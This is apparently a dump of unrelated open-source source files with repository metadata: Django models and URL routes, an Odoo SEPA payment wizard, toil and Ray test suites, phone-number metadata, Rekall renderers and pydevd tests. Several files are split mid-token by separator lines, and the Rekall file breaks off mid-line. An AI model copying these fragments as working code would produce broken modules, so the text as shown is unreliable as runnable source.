            raise exception.NotAuthorized()
        if key_id != self.key_id:
            raise exception.KeyManagerError(
                reason="cannot delete non-existent key")
        LOG.warn(_("Not deleting key %s"), key_id)
|
Saruus/drPencilcode
|
app/models.py
|
Python
|
agpl-3.0
| 1,482
| 0.010121
|
from django.db import models
# Models of drScratch
class File(models.Model):
    """Analysis record for one submitted project file."""
    filename = models.CharField(max_length=100)
    method = models.CharField(max_length=100)
    # Timestamp stored as free text rather than a DateTimeField.
    time = models.TextField()
    score = models.CharField(max_length=10)
    # Per-category results — presumably the Scratch skill categories
    # evaluated by the analyzer; TODO confirm semantics.
    move = models.CharField(max_length=100)
    art = models.CharField(max_length=100)
    text = models.CharField(max_length=100)
    sound = models.CharField(max_length=100)
    control = models.CharField(max_length=100)
    operators = models.CharField(max_length=100)
    bonus = models.CharField(max_length=1000)
class Dashboard(models.Model):
    """Per-user dashboard record."""
    user = models.TextField()
    # frelease: presumably the first-release date — TODO confirm naming.
    frelease = models.DateField()
class Activity(models.Model):
    """Dated free-text activity entry."""
    text = models.TextField()
    date = models.DateField()
class Survey(models.Model):
    """Stored answers for one user's feedback-survey submission."""
    name = models.CharField(max_length=200)
    user = models.CharField(max_length=100)
    # Submission timestamp stored as free text.
    date = models.TextField()
    # Short-string answers; question2d and question6 allow longer free text.
    question1a = models.CharField(max_length=10)
    question1b = models.CharField(max_length=10)
    question2a = models.CharField(max_length=10)
    question2b = models.CharField(max_length=10)
    question2c = models.CharField(max_length=10)
    question2d = models.CharField(max_length=200)
    question3a = models.CharField(max_length=100)
    question3b = models.CharField(max_length=10)
    question3c = models.CharField(max_length=10)
    question4 = models.CharField(max_length=10)
    question5 = models.CharField(max_length=10)
    question6 = models.CharField(max_length=500)
|
iLampard/alphaware
|
alphaware/preprocess/standardizer.py
|
Python
|
apache-2.0
| 996
| 0.00502
|
# -*- coding: utf-8 -*-
from sklearn
|
.preprocessing import StandardScaler
from sklearn_pandas import DataFrameMapper
from ..base import FactorTransformer
from ..e
|
nums import FactorType
class FactorStandardizer(FactorTransformer):
    """Standardize numeric factor columns via sklearn's StandardScaler,
    leaving categorical industry-code factors untouched."""

    def __init__(self, copy=True, out_container=False, with_mean=True, with_std=True):
        super(FactorStandardizer, self).__init__(copy=copy, out_container=out_container)
        # Passed straight through to StandardScaler for each column.
        self.with_mean = with_mean
        self.with_std = with_std

    def _build_mapper(self, factor_container):
        # One (column -> scaler) entry per factor column, selected by the
        # factor's declared type.
        data = factor_container.data
        data_mapper = [([factor_name], self._get_mapper(factor_container.property[factor_name]['type']))
                       for factor_name in data.columns]
        return DataFrameMapper(data_mapper)

    def _get_mapper(self, factor_type):
        # Industry codes are categorical: a None mapper means "pass through".
        # (INDUSTY_CODE spelling comes from the FactorType enum.)
        if factor_type == FactorType.INDUSTY_CODE:
            return None
        else:
            return StandardScaler(copy=self.copy, with_mean=self.with_mean, with_std=self.with_std)
|
cernops/CloudMan
|
export/urls.py
|
Python
|
apache-2.0
| 602
| 0.016611
|
from django.conf.urls.defaults import *
from piston.resource import Resource
from handlers import AllocationByTopHandler,AllocationByProjectHandler
import settings
# Piston REST resources wrapping the allocation report handlers.
alloc_by_top = Resource(AllocationByTopHandler)
alloc_by_project = Resource(AllocationByProjectHandler)

# Extension-less URLs default to XML; an explicit ".<format>" suffix selects
# the emitter format via the named `emitter_format` group.
urlpatterns = patterns('',
    url(r'^allocationbytop$', alloc_by_top, {'emitter_format': 'xml'}),
    url(r'^allocationbytop(\.(?P<emitter_format>.+))$', alloc_by_top),
    url(r'^allocationbyproject$', alloc_by_project, {'emitter_format': 'xml'}),
    url(r'^allocationbyproject(\.(?P<emitter_format>.+))$', alloc_by_project),
)
|
tafaRU/l10n-switzerland
|
__unported__/l10n_ch_sepa/wizard/wiz_pain_001.py
|
Python
|
agpl-3.0
| 4,378
| 0
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2011 Camptocamp SA (http://www.camptocamp.com)
# All Right Reserved
#
# Author : Yannick Vaucher (Camptocamp)
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import base64
from openerp.osv import orm, fields
from l10n_ch_sepa.base_sepa.msg_sepa import MsgSEPAFactory
|
class WizardPain001(orm.TransientModel):
    """Wizard that generates a SEPA pain.001 (credit transfer) XML file
    for the active payment order, stores it on the wizard and attaches
    it to the payment order."""

    _name = "wizard.pain001"

    _columns = {
        'pain_001_file': fields.binary('XML File', readonly=True)
    }

    def _get_country_code(self, payment):
        '''Return the country code or None
        from the bank defined in a payment order.'''
        if payment.mode.bank_id.bank.country:
            return payment.mode.bank_id.bank.country.code
        elif payment.user_id.company_id.partner_id.country:
            # Fall back to the country of the company running the payment.
            return payment.user_id.company_id.partner_id.country.code
        return None

    def _get_pain_def(self, country_code):
        '''Get the right message definition based on country code
        of selected company bank (via payment mode).

        If no country-specific implementation is registered, the generic
        'pain.001' definition is used.
        - Here we could add a second level for bank definitions'''
        if country_code:
            class_name = 'pain.001' + '.' + country_code.lower()
            if MsgSEPAFactory.has_instance(class_name):
                return MsgSEPAFactory.get_instance(class_name)
        return MsgSEPAFactory.get_instance('pain.001')

    def _create_attachment(self, cr, uid, data, context=None):
        '''Create an attachment using data provided.

        Data needed are:
        - model: type of object to attach to
        - id: id of object model
        - base64_data
        '''
        attachment_obj = self.pool.get('ir.attachment')
        # BUG fix: compute the timestamp once. The original called
        # time.strftime(..., time.gmtime()) twice, so the attachment name
        # and its file name could differ when the two calls straddled a
        # second boundary.
        stamp = time.strftime("%Y-%m-%d_%H:%M:%S", time.gmtime())
        vals = {
            'name': 'pain001_%s' % stamp,
            'datas': data['base64_data'],
            'datas_fname': 'pain001_%s.xml' % stamp,
            'res_model': data['model'],
            'res_id': data['id'],
        }
        attachment_obj.create(cr, uid, vals, context=context)

    def create_pain_001(self, cr, uid, ids, context=None):
        '''Create a pain.001 file into the wizard and add it as an
        attachment of the active payment order.'''
        payment_obj = self.pool.get('payment.order')
        if context is None:
            context = {}
        # The wizard may be called with a single id or a list of ids.
        if isinstance(ids, list):
            wiz_id = ids[0]
        else:
            wiz_id = ids
        current = self.browse(cr, uid, wiz_id, context=context)
        pay_id = context.get('active_id', [])
        payment = payment_obj.browse(cr, uid, pay_id, context=context)

        cc = self._get_country_code(payment)
        pain = self._get_pain_def(cc)
        pain_001 = pain.compute_export(cr, uid, pay_id, context=context)
        pain_001_file = base64.encodestring(pain_001.encode('utf-8'))

        data = {'base64_data': pain_001_file,
                'id': pay_id,
                'model': 'payment.order'}
        self._create_attachment(cr, uid, data, context=context)
        current.write({'pain_001_file': pain_001_file})
        return True
|
BD2KGenomics/toil-old
|
src/toil/test/src/batchJobTest.py
|
Python
|
mit
| 2,389
| 0.01172
|
#!/usr/bin/env python
"""Test Batchjob class
"""
import unittest
import os
from toil.lib.bioio import system
from optparse import OptionParser
from toil.common import setupToil
from toil.job import Job
from toil.test impor
|
t ToilTest
from toil.batchJob import BatchJob
class JobTest(ToilTest):
    """Unit tests for the BatchJob value object."""

    def setUp(self):
        super(JobTest, self).setUp()
        # Scratch toil directory for this test run; removed in tearDown.
        self.testToil = os.path.join(os.getcwd(), "testJobDir")
        parser = OptionParser()
        Job.Runner.addToilOptions(parser)
        options, args = parser.parse_args()
        options.toil = self.testToil
        self.contextManager = setupToil(options)
        config, batchSystem, jobStore = self.contextManager.__enter__()
        self.jobStore = jobStore

    def tearDown(self):
        self.contextManager.__exit__(None, None, None)
        system("rm -rf %s" % self.testToil)
        super(JobTest, self).tearDown()

    def testJob(self):
        """
        Tests functions of a batchjob.
        """
        command = "by your command"
        # BUG fix: the original used 2^32, which is bitwise XOR (== 34),
        # not exponentiation. 4 GiB was clearly intended for memory/disk.
        memory = 2 ** 32
        disk = 2 ** 32
        cpu = 1
        jobStoreID = 100
        remainingRetryCount = 5
        predecessorNumber = 0
        updateID = 1000

        j = BatchJob(command, memory, cpu, disk, jobStoreID,
                     remainingRetryCount, updateID, predecessorNumber)

        # Check attributes.
        self.assertEquals(j.command, command)
        self.assertEquals(j.memory, memory)
        self.assertEquals(j.disk, disk)
        self.assertEquals(j.cpu, cpu)
        self.assertEquals(j.jobStoreID, jobStoreID)
        self.assertEquals(j.remainingRetryCount, remainingRetryCount)
        self.assertEquals(j.predecessorNumber, predecessorNumber)
        self.assertEquals(j.updateID, updateID)
        self.assertEquals(j.stack, [])
        self.assertEquals(j.predecessorsFinished, set())
        self.assertEquals(j.logJobStoreFileID, None)

        # Check equals function.
        j2 = BatchJob(command, memory, cpu, disk, jobStoreID,
                      remainingRetryCount, updateID, predecessorNumber)
        self.assertEquals(j, j2)
        # Change an attribute and check not equal.
        j.predecessorsFinished = set(("1", "2"))
        self.assertNotEquals(j, j2)

        ###TODO test other functionality
if __name__ == '__main__':
    # Run this module's test suite when executed directly.
    unittest.main()
|
pcmoritz/ray-1
|
python/ray/tests/test_plasma_unlimited.py
|
Python
|
apache-2.0
| 7,447
| 0
|
import numpy as np
import random
import os
import shutil
import platform
import pytest
import ray
from ray.test_utils import wait_for_condition
from ray.internal.internal_api import memory_summary
MB = 1024 * 1024
def _init_ray():
    """Start Ray with a 700 MB object store and plasma_unlimited enabled."""
    system_config = {"plasma_unlimited": True}
    return ray.init(
        num_cpus=2,
        object_store_memory=700e6,
        _system_config=system_config)
def _check_spilled_mb(address, spilled=None, restored=None, fallback=None):
    """Poll the cluster memory summary until the spilled / restored /
    filesystem-fallback MiB counters match the expected values.

    A value of None means the corresponding phrase must be absent from
    the summary entirely.
    """

    def _matches(summary, phrase, expected):
        # When a value is expected, the exact "<phrase> <N> MiB" line must
        # be present; otherwise the phrase must not appear at all.
        if expected:
            return "{} {} MiB".format(phrase, expected) in summary
        return phrase not in summary

    def _ok():
        summary = memory_summary(
            address=address["redis_address"], stats_only=True)
        print(summary)
        return (_matches(summary, "Restored", restored)
                and _matches(summary, "Spilled", spilled)
                and _matches(summary,
                             "Plasma filesystem mmap usage:", fallback))

    wait_for_condition(_ok, timeout=3, retry_interval_ms=1000)
@pytest.mark.skipif(
    platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_fallback_when_spilling_impossible_on_put():
    """With every object pinned by an in-scope value, nothing can be
    spilled, so the second put must fall back to a filesystem mmap."""
    try:
        address = _init_ray()
        x1 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
        # Holding x1p pins x1 in the 700 MB store.
        x1p = ray.get(x1)
        # x2 will be fallback allocated on the filesystem.
        x2 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
        x2p = ray.get(x2)
        del x1p
        del x2p
        _check_spilled_mb(address, spilled=None, fallback=400)
    finally:
        ray.shutdown()
@pytest.mark.skipif(
    platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_spilling_when_possible_on_put():
    """When nothing pins the objects, puts beyond store capacity should
    spill to disk rather than use the filesystem fallback."""
    try:
        address = _init_ray()
        results = []
        # Five 400 MB puts into a 700 MB store: four must be spilled.
        for _ in range(5):
            results.append(ray.put(np.zeros(400 * MB, dtype=np.uint8)))
        _check_spilled_mb(address, spilled=1600)
    finally:
        ray.shutdown()
@pytest.mark.skipif(
    platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_fallback_when_spilling_impossible_on_get():
    """A get that cannot make room by spilling (because the other object
    is pinned) must fall back to a filesystem mmap allocation."""
    try:
        address = _init_ray()
        x1 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
        # x1 will be spilled.
        x2 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
        _check_spilled_mb(address, spilled=400)
        # x1 will be restored, x2 will be spilled.
        x1p = ray.get(x1)
        _check_spilled_mb(address, spilled=800, restored=400)
        # x2 will be restored, triggering a fallback allocation.
        x2p = ray.get(x2)
        _check_spilled_mb(address, spilled=800, restored=800, fallback=400)
        del x1p
        del x2p
    finally:
        ray.shutdown()
@pytest.mark.skipif(
    platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_spilling_when_possible_on_get():
    """When no values are held by the driver, gets should alternate
    restore/spill with no filesystem fallback needed."""
    try:
        address = _init_ray()
        x1 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
        # x1 will be spilled.
        x2 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
        _check_spilled_mb(address, spilled=400)
        # x1 will be restored, x2 will be spilled.
        ray.get(x1)
        _check_spilled_mb(address, spilled=800, restored=400)
        # x2 will be restored, spilling x1.
        ray.get(x2)
        _check_spilled_mb(address, spilled=800, restored=800)
    finally:
        ray.shutdown()
@pytest.mark.skipif(
    platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_task_unlimited():
    """Fallback allocation also works inside a remote task: getting a
    spilled arg and putting a new object both fall back when needed."""
    try:
        address = _init_ray()
        x1 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
        refs = [x1]
        # x1 is spilled.
        x2 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
        x2p = ray.get(x2)
        sentinel = ray.put(np.zeros(100 * MB, dtype=np.uint8))
        _check_spilled_mb(address, spilled=400)

        @ray.remote
        def consume(refs):
            # triggers fallback allocation, spilling of the sentinel
            ray.get(refs[0])
            # triggers fallback allocation.
            return ray.put(np.zeros(400 * MB, dtype=np.uint8))

        # round 1
        ray.get(consume.remote(refs))
        _check_spilled_mb(address, spilled=500, restored=400, fallback=400)
        del x2p
        del sentinel
    finally:
        ray.shutdown()
@pytest.mark.skipif(
    platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_task_unlimited_multiget_args():
    """Tasks whose combined args exceed store memory should still run
    (via fallback allocation) without thrashing the object store."""
    try:
        address = _init_ray()
        # Too many refs to fit into memory.
        refs = []
        for _ in range(10):
            refs.append(ray.put(np.zeros(200 * MB, dtype=np.uint8)))
        x2 = ray.put(np.zeros(600 * MB, dtype=np.uint8))
        x2p = ray.get(x2)
        _check_spilled_mb(address, spilled=2000)

        @ray.remote
        def consume(refs):
            # Should work without thrashing.
            ray.get(refs)
            return os.getpid()

        ray.get([consume.remote(refs) for _ in range(1000)])
        _check_spilled_mb(address, spilled=2000, restored=2000, fallback=2000)
        del x2p
    finally:
        ray.shutdown()
@pytest.mark.skipif(
    platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_fd_reuse_no_memory_corruption(shutdown_only):
    """Regression test: reusing plasma mmap file descriptors must not
    corrupt object contents passed between actors."""

    @ray.remote
    class Actor:
        def produce(self, i):
            # Random size (up to ~200 MB) exercises different allocations;
            # the first element tags the array with the round number.
            s = int(random.random() * 200)
            z = np.ones(s * 1024 * 1024)
            z[0] = i
            return z

        def consume(self, x, i):
            print(x)
            # The tag must survive the transfer intact.
            assert x[0] == i, x

    ray.init(object_store_memory=100e6)
    a = Actor.remote()
    b = Actor.remote()
    for i in range(20):
        x_id = a.produce.remote(i)
        ray.get(b.consume.remote(x_id, i))
@pytest.mark.skipif(
    platform.system() != "Linux",
    reason="Only Linux handles fallback allocation disk full error.")
def test_fallback_allocation_failure(shutdown_only):
    """When the fallback filesystem (/dev/shm) fills up, further puts
    must raise ObjectStoreFullError instead of crashing."""
    ray.init(
        object_store_memory=100e6,
        _temp_dir="/dev/shm",
        _system_config={"plasma_unlimited": True})
    shm_size = shutil.disk_usage("/dev/shm").total
    # Large enough that eight puts cannot all fit in /dev/shm.
    object_size = max(100e6, shm_size // 5)
    num_exceptions = 0
    refs = []
    for i in range(8):
        try:
            refs.append(ray.put(np.zeros(object_size, dtype=np.uint8)))
        except ray.exceptions.ObjectStoreFullError:
            num_exceptions = num_exceptions + 1
    assert num_exceptions > 0
# TODO(ekl) enable this test once we implement this behavior.
# @pytest.mark.skipif(
# platform.system() == "Windows", reason="Need to fix up for Windows.")
# def test_task_unlimited_huge_args():
# try:
# address = _init_ray()
#
# # PullManager should raise an error, since the set of task args is
# # too huge to fit into memory.
# @ray.remote
# def consume(*refs):
# return "ok"
#
# # Too many refs to fit into memory.
# refs = []
# for _ in range(10):
# refs.append(ray.put(np.zeros(200 * MB, dtype=np.uint8)))
#
# with pytest.raises(Exception):
# ray.get(consume.remote(*refs))
# finally:
# ray.shutdown()
if __name__ == "__main__":
    import sys

    # Allow running this file directly: delegate to pytest and propagate
    # its exit status.
    sys.exit(pytest.main(["-v", __file__]))
|
WillisXChen/django-oscar
|
oscar/lib/python2.7/site-packages/phonenumbers/data/region_NF.py
|
Python
|
bsd-3-clause
| 1,648
| 0.010316
|
"""Auto-generated file, do not edit by hand. NF metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
# NF = Norfolk Island, country calling code 672. This file is generated;
# regenerate from the upstream metadata rather than editing by hand.
PHONE_METADATA_NF = PhoneMetadata(id='NF', country_code=672, international_prefix='00',
    general_desc=PhoneNumberDesc(national_number_pattern='[13]\\d{5}', possible_number_pattern='\\d{5,6}'),
    fixed_line=PhoneNumberDesc(national_number_pattern='(?:1(?:06|17|28|39)|3[012]\\d)\\d{3}', possible_number_pattern='\\d{5,6}', example_number='106609'),
    mobile=PhoneNumberDesc(national_number_pattern='38\\d{4}', possible_number_pattern='\\d{5,6}', example_number='381234'),
    toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    number_format=[NumberFormat(pattern='(\\d{2})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['1']),
        NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['3'])])
|
rainaashutosh/MyTestRekall
|
rekall-core/rekall/plugins/renderers/base_objects.py
|
Python
|
gpl-2.0
| 11,403
| 0.000351
|
# -*- coding: utf-8 -*-
# Rekall Memory Forensics
# Copyright 2014 Google Inc. All Rights Reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
"""This module implements base object renderers."""
from rekall import utils
from rekall.ui import renderer as renderer_module
from rekall.ui import text
class PluginObjectTextRenderer(text.TextObjectRenderer):
    """Render Plugin objects: repr() in full mode, plugin name in compact."""
    renders_type = "Plugin"

    def render_full(self, target, **_):
        return text.Cell(repr(target))

    def render_compact(self, target, **_):
        return text.Cell(target.name)
class BaseObjectTextRenderer(text.TextObjectRenderer):
    """Default text renderer for rekall BaseObject instances."""
    renders_type = "BaseObject"

    def render_address(self, target, **options):
        # Render the object's offset in its address space.
        return text.Cell(
            self.format_address(target.obj_offset, **options)
        )

    def render_full(self, target, **options):
        # v() dereferences the object to its underlying value.
        result = text.Cell(unicode(target.v()), **options)
        return result

    def render_value(self, target, **_):
        return text.Cell(unicode(target.v()))
class StringTextRenderer(BaseObjectTextRenderer):
    """Render String objects, truncating at the first NUL terminator."""
    renders_type = "String"

    def render_full(self, target, **_):
        # Empty-after-truncation strings render as u"".
        return text.Cell(
            utils.SmartUnicode(target).split("\x00")[0] or u"")

    render_value = render_full
    render_compact = render_full
class NoneObjectTextRenderer(BaseObjectTextRenderer):
    """NoneObjects will be rendered with a single dash '-'."""
    renders_type = "NoneObject"

    def render_row(self, target, **_):
        return text.Cell("-")
class NoneTextRenderer(NoneObjectTextRenderer):
    """Python's None is rendered the same way as rekall's NoneObject."""
    renders_type = "NoneType"
class UnixTimestampObjectRenderer(BaseObjectTextRenderer):
    """Render UnixTimeStamp values; details mode shows the repr."""
    renders_type = "UnixTimeStamp"

    def render_row(self, target, details=False, **options):
        if details:
            return text.Cell(repr(target))

        # NOTE(review): `!= None` (rather than `is not None`) is presumably
        # deliberate here - rekall NoneObject instances compare equal to
        # None via __eq__, which an identity test would miss. Confirm
        # before "fixing".
        if target != None:
            return text.Cell(unicode(target))

        return text.Cell("-")
class PythonBoolTextRenderer(text.TextObjectRenderer):
    """Render python bools: green for True, red for False."""
    renders_type = "bool"

    def render_full(self, target, **_):
        color = "GREEN" if target else "RED"
        # Highlight the whole cell in the chosen color.
        return text.Cell(
            value=unicode(target),
            highlights=[(0, -1, color, None)])

    render_value = render_full
    render_compact = render_full
class NativeTypeTextRenderer(BaseObjectTextRenderer):
    """Render native (integer-like) types."""
    renders_type = "NativeType"

    def render_address(self, target, width=None, **options):
        # Unlike the base class, this formats the *value* as an address,
        # not the object's own offset.
        return text.Cell(
            self.format_address(target.v(), **options),
            width=width)
class BaseBoolTextRenderer(PythonBoolTextRenderer):
    """Render rekall Bool objects by coercing them to python bool first."""
    renders_type = "Bool"

    def render_row(self, target, **kwargs):
        return super(BaseBoolTextRenderer, self).render_row(bool(target),
                                                            **kwargs)
class FlagsTextRenderer(BaseObjectTextRenderer):
    """Render Flags bitmasks as a comma separated list of set flag names."""
    renders_type = "Flags"

    def render_full(self, target, **_):
        # Collect the names of all bits set in the value, in sorted order.
        flags = []
        value = target.v()
        for k, v in sorted(target.maskmap.items()):
            if value & v:
                flags.append(k)

        return text.Cell(u', '.join(flags))

    def render_value(self, target, **_):
        # BUG fix: the original called self.v(), but the renderer has no
        # v() method - the raw value lives on the target object.
        return text.Cell(unicode(target.v()))

    def render_compact(self, target, **_):
        lines = self.render_full(target).lines
        if not lines:
            return text.Cell("-")

        # Elide long flag lists so compact cells stay a single short line.
        elided = lines[0]
        if len(elided) > 40:
            elided = elided[:39] + u"…"

        return text.Cell(elided)
class EnumerationTextRenderer(BaseObjectTextRenderer):
    """Render Enumerations by symbolic name where one is known."""
    renders_type = "Enumeration"

    def render_full(self, target, **_):
        value = target.v()
        # Fall back to the declared default, then to an UNKNOWN marker.
        name = target.choices.get(utils.SmartStr(value), target.default) or (
            u"UNKNOWN (%s)" % utils.SmartUnicode(value))

        return text.Cell(name)

    render_compact = render_full
class DatetimeTextRenderer(text.TextObjectRenderer):
    """Render python datetime objects in an ISO-like format."""
    renders_type = "datetime"

    def render_row(self, target, **_):
        # %z expands to the UTC offset; it is empty for naive datetimes.
        return text.Cell(target.strftime("%Y-%m-%d %H:%M:%S%z"))
class PointerTextRenderer(NativeTypeTextRenderer):
    """Render Pointer objects; full mode dereferences and delegates."""
    renders_type = "Pointer"

    def render_value(self, *args, **kwargs):
        return self.render_address(*args, **kwargs)

    def render_full(self, target, **_):
        target_obj = target.deref()
        # NOTE(review): `== None` is presumably deliberate - rekall's
        # NoneObject compares equal to None via __eq__. Confirm before
        # changing to `is None`.
        if target_obj == None:
            return text.Cell("-")

        # Delegate rendering to whatever renderer handles the pointee type.
        delegate_cls = renderer_module.ObjectRenderer.ForTarget(
            target_obj, renderer=self.renderer)

        return delegate_cls(session=self.session,
                            renderer=self.renderer).render_full(target_obj)

    def render_compact(self, target, **options):
        return text.Cell(
            "(%s *) %s" % (
                target.target,
                self.format_address(target.v(), **options))
        )
class ListRenderer(text.TextObjectRenderer):
    """Renders a list of other objects."""
    renders_type = ("list", "tuple", "set", "frozenset")

    def render_row(self, target, **options):
        width = options.pop("width", None)
        result = []
        for item in target:
            # Look up and instantiate the renderer for each member's type.
            object_renderer = self.ForTarget(item, self.renderer)(
                session=self.session, renderer=self.renderer)

            options["wrap"] = False
            cell = object_renderer.render_row(item, **options)
            # NOTE(review): the join separator here is the literal two
            # character sequence backslash-n, not a newline - possibly it
            # was intended to be "\n". Verify against upstream before
            # changing; kept as-is here.
            result.append("\\n".join(cell.lines).strip())

        return text.Cell(", ".join(result), width=width)
class VoidTextRenderer(PointerTextRenderer):
    """Render void pointers as '(void *) <address>'."""
    renders_type = "Void"

    def render_full(self, target, **options):
        return text.Cell(
            "(void *) %s" % self.format_address(target.v(), **options))

    render_compact = render_full
class FunctionTextRenderer(BaseObjectTextRenderer):
    """Render Function objects as a disassembly listing."""
    renders_type = "Function"

    def render_full(self, target, width=None, **_):
        # One table row per disassembled instruction:
        # address, raw opcode bytes, mnemonic text.
        table = text.TextTable(
            columns=[
                dict(name="Address", style="address"),
                dict(name="OpCode", width=16),
                dict(name="Op", width=width)
            ],
            renderer=self.renderer,
            session=self.session)

        result = []
        for instruction in target.disassemble():
            result.append(unicode(table.get_row(
                instruction.address, instruction.hexbytes, instruction.text)))

        return text.Cell("\n".join(result))

    def render_compact(self, target, **options):
        # Compact form is just the function's start address.
        return text.Cell(self.format_address(target.obj_offset, **options))

    render_value = render_compact
class StructTextRenderer(text.TextObjectRenderer):
renders_type = "Struct"
DEFAULT_STYLE = "compact"
renderers = ["TextRenderer", "TestRenderer"]
COLUMNS = None
table = None
def __init__(self, *args, **kwargs):
self.columns = kwargs.pop("columns", self.COLUMNS)
super(StructTextRenderer, self).__init__(*args, **kwargs)
if self.columns:
self.table = text.TextTable(
columns=self.columns,
renderer=self.renderer,
session=self.session)
def render_full(self, target, **_):
"""Full render of a struct outputs every field."""
result = repr(target) + "\n"
width_name = 0
fields = []
# Print all the fields sorted by offset within the struct.
for k in target.members:
width_name = max(width_name, len(k))
obj = getattr(target, k)
if obj == None:
obj = target.m(k)
fields.append(
(getattr(obj, "obj_of
|
RyodoTanaka/Coding_The_Matrix
|
python/chap_1/1.7.7.py
|
Python
|
bsd-3-clause
| 181
| 0.022099
|
#!/
|
usr/bin/env python
# -*- coding: utf-8 -*-
def myConcat(L):
    """Return the concatenation of the strings in the sequence L.

    Uses str.join, which runs in time linear in the total output length,
    instead of repeated `+=` (worst-case quadratic).
    """
    return ''.join(L)
# Fixed: the original named this variable `list`, shadowing the builtin,
# and used the Python 2 print statement. print(...) with a single argument
# behaves identically under Python 2 and 3.
words = ['I ', 'have ', 'a ', 'pen.']
print(myConcat(words))
|
fabioz/PyDev.Debugger
|
tests_python/test_extract_token.py
|
Python
|
epl-1.0
| 2,852
| 0.009852
|
# coding: utf-8
from __future__ import unicode_literals
from _pydev_bundle._pydev_completer import (isidentifier, extract_token_and_qualifier,
TokenAndQualifier)
from _pydevd_bundle.pydevd_constants import IS_PY2
def test_isidentifier():
    """Sanity checks for the completer's identifier predicate."""
    assert isidentifier('abc')
    assert not isidentifier('<')
    assert not isidentifier('')
    if IS_PY2:
        # Py3 accepts unicode identifiers
        assert not isidentifier('áéíóú')
    else:
        assert isidentifier('áéíóú')
def test_extract_token_and_qualifier():
    """Exercise (text, line, column) -> (token, qualifier) extraction.

    The qualifier is the identifier fragment immediately left of the
    column; the token is the dotted prefix before the qualifier.
    Non-identifier characters (like '<') reset both.
    """
    assert extract_token_and_qualifier('tok', 0, 0) == TokenAndQualifier('', '')
    assert extract_token_and_qualifier('tok', 0, 1) == TokenAndQualifier('', 't')
    assert extract_token_and_qualifier('tok', 0, 2) == TokenAndQualifier('', 'to')
    assert extract_token_and_qualifier('tok', 0, 3) == TokenAndQualifier('', 'tok')
    # Columns past the end clamp to the line length.
    assert extract_token_and_qualifier('tok', 0, 4) == TokenAndQualifier('', 'tok')

    assert extract_token_and_qualifier('tok.qual', 0, 0) == TokenAndQualifier('', '')
    assert extract_token_and_qualifier('tok.qual', 0, 1) == TokenAndQualifier('', 't')
    assert extract_token_and_qualifier('tok.qual', 0, 2) == TokenAndQualifier('', 'to')
    assert extract_token_and_qualifier('tok.qual', 0, 3) == TokenAndQualifier('', 'tok')
    assert extract_token_and_qualifier('tok.qual', 0, 4) == TokenAndQualifier('tok', '')
    assert extract_token_and_qualifier('tok.qual', 0, 5) == TokenAndQualifier('tok', 'q')
    assert extract_token_and_qualifier('tok.qual', 0, 6) == TokenAndQualifier('tok', 'qu')
    assert extract_token_and_qualifier('tok.qual', 0, 7) == TokenAndQualifier('tok', 'qua')
    assert extract_token_and_qualifier('tok.qual', 0, 8) == TokenAndQualifier('tok', 'qual')

    # out of range (column)
    assert extract_token_and_qualifier('tok.qual.qual2', 0, 100) == TokenAndQualifier('tok.qual', 'qual2')

    assert extract_token_and_qualifier('t<ok', 0, 0) == TokenAndQualifier('', '')
    assert extract_token_and_qualifier('t<ok', 0, 1) == TokenAndQualifier('', 't')
    assert extract_token_and_qualifier('t<ok', 0, 2) == TokenAndQualifier('', '')
    assert extract_token_and_qualifier('t<ok', 0, 3) == TokenAndQualifier('', 'o')
    assert extract_token_and_qualifier('t<ok', 0, 4) == TokenAndQualifier('', 'ok')

    # Multi-line input: the line index selects which line is scanned.
    assert extract_token_and_qualifier('a\nt<ok', 1, 0) == TokenAndQualifier('', '')
